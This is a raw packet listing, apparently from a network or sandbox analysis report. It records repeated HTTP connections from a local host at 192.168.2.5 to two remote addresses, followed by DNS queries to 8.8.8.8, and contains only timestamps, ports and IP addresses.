Mar 9, 2021 09:21:13.948057890 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:14.053689957 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:14.102271080 CET	80	49751	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:14.102755070 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:14.123565912 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:14.123627901 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:14.172153950 CET	80	49751	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:14.172187090 CET	80	49751	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:14.483556032 CET	80	49751	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:14.653016090 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:17.409177065 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.447592974 CET	80	49743	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:17.447698116 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.484808922 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.522793055 CET	80	49753	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:17.522941113 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.523437023 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.523457050 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:17.561415911 CET	80	49753	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:17.561429024 CET	80	49753	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:17.876846075 CET	80	49753	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:17.998008013 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.066209078 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.104491949 CET	80	49744	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:19.104590893 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.154757977 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.193063021 CET	80	49754	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:19.193685055 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.194303989 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.194411993 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:19.232398987 CET	80	49754	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:19.232446909 CET	80	49754	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:19.558442116 CET	80	49754	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:19.700278997 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:21.955202103 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:21.994462013 CET	80	49745	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:21.995387077 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:22.038373947 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:22.076435089 CET	80	49756	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:22.076560974 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:22.077797890 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:22.077948093 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:22.115742922 CET	80	49756	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:22.115847111 CET	80	49756	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:22.417890072 CET	80	49756	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:22.497046947 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:24.610039949 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:24.658793926 CET	80	49751	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:24.658878088 CET	49751	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:24.710824966 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:24.750370026 CET	80	49757	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:24.750469923 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:24.751147985 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:24.751737118 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:24.789200068 CET	80	49757	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:24.789753914 CET	80	49757	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:25.095045090 CET	80	49757	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:25.200421095 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:27.649527073 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:27.687536001 CET	80	49753	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:27.687645912 CET	49753	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:27.737519979 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:27.788623095 CET	80	49758	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:27.788966894 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:27.789314032 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:27.789541960 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:27.840357065 CET	80	49758	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:27.840703964 CET	80	49758	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:28.152148008 CET	80	49758	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:28.201035976 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:28.928046942 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:28.968955040 CET	80	49754	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:28.969062090 CET	49754	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:29.004795074 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:29.055567980 CET	80	49759	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:29.056164980 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:29.056694984 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:29.057959080 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:29.107332945 CET	80	49759	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:29.108913898 CET	80	49759	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:29.415699005 CET	80	49759	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:29.466408014 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:31.643738985 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.681794882 CET	80	49756	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:31.685524940 CET	49756	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.719786882 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.758032084 CET	80	49760	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:31.758589983 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.758948088 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.758999109 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:31.797113895 CET	80	49760	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:31.797159910 CET	80	49760	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:32.117027044 CET	80	49760	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:32.169809103 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.175924063 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.216682911 CET	80	49757	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:36.216769934 CET	49757	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.273533106 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.311628103 CET	80	49761	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:36.311860085 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.312733889 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.312772989 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:36.350708961 CET	80	49761	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:36.350740910 CET	80	49761	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:36.664208889 CET	80	49761	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:36.717022896 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.399436951 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:37.450088978 CET	80	49758	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:37.450165987 CET	49758	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:37.474649906 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.512736082 CET	80	49762	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:37.513406992 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.513902903 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.514997959 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.551794052 CET	80	49762	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:37.552861929 CET	80	49762	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:37.867126942 CET	80	49762	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:37.872545004 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:37.918663025 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.924148083 CET	80	49759	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:37.924314976 CET	49759	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:37.949579000 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.987529993 CET	80	49763	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:37.989464998 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.989856958 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:37.989926100 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:38.029148102 CET	80	49763	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:38.029182911 CET	80	49763	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:38.325104952 CET	80	49763	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:38.373414040 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.001259089 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.039654970 CET	80	49760	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:41.039994955 CET	49760	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.071789026 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.110131979 CET	80	49765	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:41.110337019 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.110680103 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.110749960 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:41.148689032 CET	80	49765	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:41.148749113 CET	80	49765	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:41.461693048 CET	80	49765	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:41.514302969 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.738491058 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.776776075 CET	80	49762	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:45.777071953 CET	49762	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.834646940 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.873066902 CET	80	49767	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:45.873236895 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.873584986 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.873632908 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.885382891 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.911763906 CET	80	49767	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:45.911819935 CET	80	49767	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:45.923588037 CET	80	49763	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:45.923846006 CET	49763	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:45.962493896 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:46.011290073 CET	80	49768	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:46.011462927 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:46.011737108 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:46.011795998 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:46.060614109 CET	80	49768	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:46.060659885 CET	80	49768	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:46.073626995 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.112046957 CET	80	49761	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.112164974 CET	49761	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.163419962 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.202694893 CET	80	49769	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.203053951 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.203630924 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.203675032 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.210813999 CET	80	49767	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.241566896 CET	80	49769	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.241592884 CET	80	49769	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.264755964 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:46.367882013 CET	80	49768	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:46.420998096 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:46.554378033 CET	80	49769	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:46.607753992 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.356046915 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.394520998 CET	80	49765	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:49.396106005 CET	49765	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.447882891 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.486500978 CET	80	49771	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:49.486625910 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.487282038 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.487341881 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:49.526793957 CET	80	49771	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:49.526834965 CET	80	49771	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:49.934945107 CET	80	49771	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:49.983836889 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:53.691736937 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.740706921 CET	80	49768	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:53.740787029 CET	49768	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.762411118 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.810872078 CET	80	49772	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:53.811016083 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.811467886 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.811515093 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:53.859818935 CET	80	49772	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:53.859824896 CET	80	49772	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:53.973412037 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.011841059 CET	80	49767	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:54.011939049 CET	49767	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.051867962 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.100815058 CET	80	49773	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:54.102992058 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.103319883 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.103380919 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.152103901 CET	80	49773	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:54.152152061 CET	80	49773	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:54.155836105 CET	80	49772	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:54.203130960 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.451872110 CET	80	49773	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:54.499829054 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:54.842240095 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.880728960 CET	80	49769	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:54.880795956 CET	49769	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.931268930 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.969367027 CET	80	49774	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:54.969468117 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.970089912 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:54.970299006 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:55.008084059 CET	80	49774	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:55.008145094 CET	80	49774	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:55.307497978 CET	80	49774	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:55.359256983 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.232944012 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.271086931 CET	80	49771	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:57.271173000 CET	49771	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.299803972 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.337744951 CET	80	49775	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:57.337831974 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.338397980 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.338500023 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:57.376266003 CET	80	49775	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:57.376312017 CET	80	49775	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:57.675682068 CET	80	49775	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:57.718796968 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:01.642496109 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:01.691046953 CET	80	49772	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:01.693300962 CET	49772	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:01.709647894 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:01.747679949 CET	80	49777	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:01.747836113 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:01.750751019 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:01.750794888 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:01.788964033 CET	80	49777	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:01.788986921 CET	80	49777	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:02.087807894 CET	80	49777	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:02.141216993 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:03.044398069 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:03.093341112 CET	80	49773	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:03.093457937 CET	49773	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:03.135117054 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:03.173187971 CET	80	49778	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:03.173327923 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:03.173662901 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:03.173682928 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:03.211684942 CET	80	49778	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:03.211708069 CET	80	49778	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:03.508982897 CET	80	49778	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:03.563040972 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.496315956 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.534689903 CET	80	49774	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:04.534771919 CET	49774	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.610764980 CET	49779	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.651562929 CET	80	49779	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:04.653394938 CET	49779	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.654583931 CET	49779	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.654609919 CET	49779	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.692842007 CET	80	49779	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:04.692894936 CET	80	49779	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:04.814322948 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.852962971 CET	80	49775	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:04.853054047 CET	49775	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:04.984672070 CET	80	49779	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:05.033454895 CET	49779	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:05.421773911 CET	49780	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:05.472194910 CET	80	49780	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:05.472862959 CET	49780	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:05.474257946 CET	49780	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:05.474340916 CET	49780	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:05.524823904 CET	80	49780	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:05.524867058 CET	80	49780	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:05.823224068 CET	80	49780	172.67.178.142	192.168.2.5
Mar 9, 2021 09:22:05.875780106 CET	49780	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:22:09.825452089 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.865967035 CET	80	49777	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:09.866091013 CET	49777	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.904921055 CET	49781	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.944856882 CET	80	49781	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:09.945246935 CET	49781	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.945657969 CET	49781	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.945677042 CET	49781	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:09.985320091 CET	80	49781	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:09.985353947 CET	80	49781	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:10.288165092 CET	80	49781	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:10.329514980 CET	49781	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.644195080 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.693605900 CET	80	49778	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:11.693713903 CET	49778	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.723072052 CET	49782	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.761347055 CET	80	49782	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:11.761586905 CET	49782	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.762434006 CET	49782	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.762517929 CET	49782	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:22:11.800501108 CET	80	49782	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:11.800518990 CET	80	49782	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:12.098731041 CET	80	49782	104.21.48.50	192.168.2.5
Mar 9, 2021 09:22:12.141943932 CET	49782	80	192.168.2.5	104.21.48.50

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2021 09:20:02.867178917 CET	61733	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:02.923342943 CET	53	61733	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:05.929069042 CET	65447	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:05.974905968 CET	53	65447	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:07.875845909 CET	52441	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:07.924978971 CET	53	52441	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:09.190464973 CET	62176	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:09.238955975 CET	53	62176	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:14.839911938 CET	59596	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:14.903729916 CET	53	59596	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:18.657510996 CET	65296	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:18.716584921 CET	53	65296	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:19.577488899 CET	63183	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:19.626646042 CET	53	63183	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:26.550331116 CET	60151	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:26.607656956 CET	53	60151	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:30.605217934 CET	56969	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:30.661494017 CET	53	56969	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:32.256839991 CET	55161	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:32.311490059 CET	53	55161	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:32.625494957 CET	54757	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:32.672703981 CET	53	54757	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:37.103554964 CET	49992	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:37.307370901 CET	53	49992	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:37.434144020 CET	60075	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:37.480103970 CET	53	60075	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:39.006627083 CET	55016	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:39.064270973 CET	53	55016	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:40.607624054 CET	64346	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:40.662359953 CET	53	64346	8.8.8.8	192.168.2.5
